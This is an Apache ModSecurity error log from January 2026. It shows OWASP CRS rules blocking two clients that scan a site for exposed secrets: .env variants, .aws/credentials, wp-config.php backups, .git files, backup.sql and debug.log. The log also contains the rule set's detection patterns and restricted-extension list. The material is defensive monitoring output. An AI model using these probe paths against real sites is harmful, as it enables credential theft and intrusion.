[Fri Jan 09 03:56:56.823798 2026] [:error] [pid 1290986] [client 185.177.72.67:20166] [client 185.177.72.67] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aWBueHvPx48oXeBpWHAphQAAAAE"]
[Fri Jan 09 03:56:56.824031 2026] [:error] [pid 1290986] [client 185.177.72.67:20166] [client 185.177.72.67] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aWBueHvPx48oXeBpWHAphQAAAAE"]
[Fri Jan 09 03:56:56.824192 2026] [:error] [pid 1290986] [client 185.177.72.67:20166] [client 185.177.72.67] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aWBueHvPx48oXeBpWHAphQAAAAE"]
[Fri Jan 09 03:57:06.915850 2026] [:error] [pid 1290989] [client 185.177.72.67:42892] [client 185.177.72.67] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.save"] [unique_id "aWBugrwxb_CFGAx2PBFSoAAAAAQ"]
[Fri Jan 09 03:57:06.916088 2026] [:error] [pid 1290989] [client 185.177.72.67:42892] [client 185.177.72.67] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.save"] [unique_id "aWBugrwxb_CFGAx2PBFSoAAAAAQ"]
[Fri Jan 09 03:57:06.916229 2026] [:error] [pid 1290989] [client 185.177.72.67:42892] [client 185.177.72.67] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.save"] [unique_id "aWBugrwxb_CFGAx2PBFSoAAAAAQ"]
[Fri Jan 09 03:57:07.015031 2026] [:error] [pid 1290985] [client 185.177.72.67:42906] [client 185.177.72.67] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/.env.backup"] [unique_id "aWBugwhnMz7Kl76N6_LzGgAAAAA"]
[Fri Jan 09 03:57:07.015170 2026] [:error] [pid 1290985] [client 185.177.72.67:42906] [client 185.177.72.67] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.backup"] [unique_id "aWBugwhnMz7Kl76N6_LzGgAAAAA"]
[Fri Jan 09 03:57:07.015392 2026] [:error] [pid 1290985] [client 185.177.72.67:42906] [client 185.177.72.67] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.backup"] [unique_id "aWBugwhnMz7Kl76N6_LzGgAAAAA"]
[Fri Jan 09 03:57:07.015555 2026] [:error] [pid 1290985] [client 185.177.72.67:42906] [client 185.177.72.67] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.backup"] [unique_id "aWBugwhnMz7Kl76N6_LzGgAAAAA"]
[Fri Jan 09 03:57:29.341116 2026] [:error] [pid 1291018] [client 185.177.72.67:17302] [client 185.177.72.67] ModSecurity: Warning. Matched phrase ".aws/credentials" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .aws/credentials found within REQUEST_FILENAME: /.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.aws/credentials"] [unique_id "aWBumfa-381C0T8V_x3ZuAAAAAU"]
[Fri Jan 09 03:57:29.341349 2026] [:error] [pid 1291018] [client 185.177.72.67:17302] [client 185.177.72.67] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.aws/credentials"] [unique_id "aWBumfa-381C0T8V_x3ZuAAAAAU"]
[Fri Jan 09 03:57:29.341491 2026] [:error] [pid 1291018] [client 185.177.72.67:17302] [client 185.177.72.67] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.aws/credentials"] [unique_id "aWBumfa-381C0T8V_x3ZuAAAAAU"]
[Fri Jan 09 03:57:32.156566 2026] [:error] [pid 1291018] [client 185.177.72.67:17356] [client 185.177.72.67] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/wp-config.php.bak"] [unique_id "aWBunPa-381C0T8V_x3ZuQAAAAU"]
[Fri Jan 09 03:57:32.156801 2026] [:error] [pid 1291018] [client 185.177.72.67:17356] [client 185.177.72.67] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/wp-config.php.bak"] [unique_id "aWBunPa-381C0T8V_x3ZuQAAAAU"]
[Fri Jan 09 03:57:32.157123 2026] [:error] [pid 1291018] [client 185.177.72.67:17356] [client 185.177.72.67] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/wp-config.php.bak"] [unique_id "aWBunPa-381C0T8V_x3ZuQAAAAU"]
[Fri Jan 09 03:57:32.157358 2026] [:error] [pid 1291018] [client 185.177.72.67:17356] [client 185.177.72.67] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/wp-config.php.bak"] [unique_id "aWBunPa-381C0T8V_x3ZuQAAAAU"]
[Fri Jan 09 03:57:36.348138 2026] [:error] [pid 1290989] [client 185.177.72.67:39218] [client 185.177.72.67] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aWBuoLwxb_CFGAx2PBFSogAAAAQ"]
[Fri Jan 09 03:57:36.348367 2026] [:error] [pid 1290989] [client 185.177.72.67:39218] [client 185.177.72.67] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aWBuoLwxb_CFGAx2PBFSogAAAAQ"]
[Fri Jan 09 03:57:36.348531 2026] [:error] [pid 1290989] [client 185.177.72.67:39218] [client 185.177.72.67] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aWBuoLwxb_CFGAx2PBFSogAAAAQ"]
[Fri Jan 09 03:57:36.420374 2026] [:error] [pid 1290985] [client 185.177.72.67:39234] [client 185.177.72.67] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/head"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/HEAD"] [unique_id "aWBuoAhnMz7Kl76N6_LzHAAAAAA"]
[Fri Jan 09 03:57:36.420581 2026] [:error] [pid 1290985] [client 185.177.72.67:39234] [client 185.177.72.67] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/HEAD"] [unique_id "aWBuoAhnMz7Kl76N6_LzHAAAAAA"]
[Fri Jan 09 03:57:36.420727 2026] [:error] [pid 1290985] [client 185.177.72.67:39234] [client 185.177.72.67] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/HEAD"] [unique_id "aWBuoAhnMz7Kl76N6_LzHAAAAAA"]
[Fri Jan 09 03:57:40.513748 2026] [:error] [pid 1290988] [client 185.177.72.67:39244] [client 185.177.72.67] ModSecurity: Warning. Matched phrase ".gitconfig" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .gitconfig found within REQUEST_FILENAME: /.gitconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.gitconfig"] [unique_id "aWBupJnqcf3ij-c56sstIAAAAAM"]
[Fri Jan 09 03:57:40.513968 2026] [:error] [pid 1290988] [client 185.177.72.67:39244] [client 185.177.72.67] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.gitconfig"] [unique_id "aWBupJnqcf3ij-c56sstIAAAAAM"]
[Fri Jan 09 03:57:40.514113 2026] [:error] [pid 1290988] [client 185.177.72.67:39244] [client 185.177.72.67] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.gitconfig"] [unique_id "aWBupJnqcf3ij-c56sstIAAAAAM"]
[Fri Jan 09 16:49:19.850417 2026] [:error] [pid 1290985] [client 18.130.245.147:41944] [client 18.130.245.147] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aWEjfwhnMz7Kl76N6_LzegAAAAA"]
[Fri Jan 09 16:49:19.850650 2026] [:error] [pid 1290985] [client 18.130.245.147:41944] [client 18.130.245.147] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aWEjfwhnMz7Kl76N6_LzegAAAAA"]
[Fri Jan 09 16:49:19.850808 2026] [:error] [pid 1290985] [client 18.130.245.147:41944] [client 18.130.245.147] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aWEjfwhnMz7Kl76N6_LzegAAAAA"]
[Fri Jan 09 16:49:19.948999 2026] [:error] [pid 1290986] [client 18.130.245.147:41978] [client 18.130.245.147] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aWEjf3vPx48oXeBpWHAqWgAAAAE"]
[Fri Jan 09 16:49:19.949208 2026] [:error] [pid 1290986] [client 18.130.245.147:41978] [client 18.130.245.147] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aWEjf3vPx48oXeBpWHAqWgAAAAE"]
[Fri Jan 09 16:49:19.949374 2026] [:error] [pid 1290986] [client 18.130.245.147:41978] [client 18.130.245.147] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aWEjf3vPx48oXeBpWHAqWgAAAAE"]
[Fri Jan 09 16:49:20.144078 2026] [:error] [pid 1290988] [client 18.130.245.147:42044] [client 18.130.245.147] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/backup.sql"] [unique_id "aWEjgJnqcf3ij-c56sst9AAAAAM"]
[Fri Jan 09 16:49:20.144387 2026] [:error] [pid 1290988] [client 18.130.245.147:42044] [client 18.130.245.147] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/backup.sql"] [unique_id "aWEjgJnqcf3ij-c56sst9AAAAAM"]
[Fri Jan 09 16:49:20.144541 2026] [:error] [pid 1290988] [client 18.130.245.147:42044] [client 18.130.245.147] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/backup.sql"] [unique_id "aWEjgJnqcf3ij-c56sst9AAAAAM"]
[Fri Jan 09 16:49:20.244031 2026] [:error] [pid 1291018] [client 18.130.245.147:42072] [client 18.130.245.147] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/debug.log"] [unique_id "aWEjgPa-381C0T8V_x3aXwAAAAU"]
[Fri Jan 09 16:49:20.244319 2026] [:error] [pid 1291018] [client 18.130.245.147:42072] [client 18.130.245.147] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/debug.log"] [unique_id "aWEjgPa-381C0T8V_x3aXwAAAAU"]
[Fri Jan 09 16:49:20.244461 2026] [:error] [pid 1291018] [client 18.130.245.147:42072] [client 18.130.245.147] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/debug.log"] [unique_id "aWEjgPa-381C0T8V_x3aXwAAAAU"]
